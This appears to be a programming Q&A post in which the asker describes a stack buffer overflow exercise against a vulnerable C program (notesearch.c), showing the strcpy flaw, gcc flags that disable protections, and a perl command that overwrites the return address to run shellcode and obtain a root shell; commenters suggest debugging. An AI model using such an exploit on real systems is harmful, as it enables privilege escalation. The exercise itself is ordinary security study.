# I can get my shellcode to execute when my program is compiled using gcc-3.4(older version), but it doesn't work when compiled on newer versions of gcc

Tags: c, linux, gcc, buffer-overflow, shellcode

I am on Linux. The hack I am trying get to work is a buffer overflow  which overflows into the return address of the program's main() stackframe replacing it with the address pointing to the environment variable on the stack that holds my shellcode (shellcode for 32 bit systems).

Here is the program (notesearch.c):

```
char searchstring[100];

strcpy(searchstring, argv[1]) //the command line argument will be placed into searchstring.
                              //the argument is the address of the environment variable    
                              //that holds my shellcode ("\x3c\xff\xff\xbf") repeated 160 times to 
                              //cause an overflow
```

When I compile the program with gcc-3.4 (older version of gcc) and run the program, it executes the shellcode, which is great:

```
gcc-3.4 -m32 -z execstack -o notesearch notesearch.c
./notesearch $(perl -e 'print "\x3c\xff\xff\xbf"x160')
Running program notesearch...
SHELLCODE is located at 0xbfffff3c...
End of notesearch program, exiting main...
#whoami          //shell code executes, giving me root access to the system
#root
```

But when i compile with gcc-9 (one of the newer gcc releases) and run the program, the progrom gives a segmentation fault error when trying to execute the shellcode:

```
gcc -m32 -z execstack -fno-stack-protector -o notesearch notesearch.c
./notesearch $(perl -e 'print "\x3c\xff\xff\xbf"x160')
Running program notesearch...
SHELLCODE is located at 0xbfffff3c...
End of notesearch program, exiting main...
SEGMENTATION FAULT ERROR (CORE DUMP)
```

I am trying to get my shellcode to execute for this program compiled using the newer gcc's, but as you can see I have no luck. I tried adding flags like `-z execstack` and `-fno-stack-protector` when compiling to remove buffer overflow protection but it isn't helping. I also turned off **address space layout randomization** on my system. Does anyone know how I can get my shellcode to run for the program compiled using a newer gcc?

Comment: Have you used a debugger to look at what's actually on the stack? It's not too surprising that the stack layout would be different, and you can't expect shellcode to work when you change compilers.

Comment: @Thomas Jager Yeah, I used the gdb debugger to confirm that the memory that holds the return address is indeed overwritten with the hacked return address. Also, I confirmed that the address I overflow the buffer with does indeed point to the start of my shellcode

Comment: @chrisjericho60120 Have you traced it instruction by instruction? You should be able to see what's happening to your overwritten address. When you have it crash during debugging you should be able to see exactly what lead to the segfault.

Comment: I'm delighted to say I have no idea how to answer this question.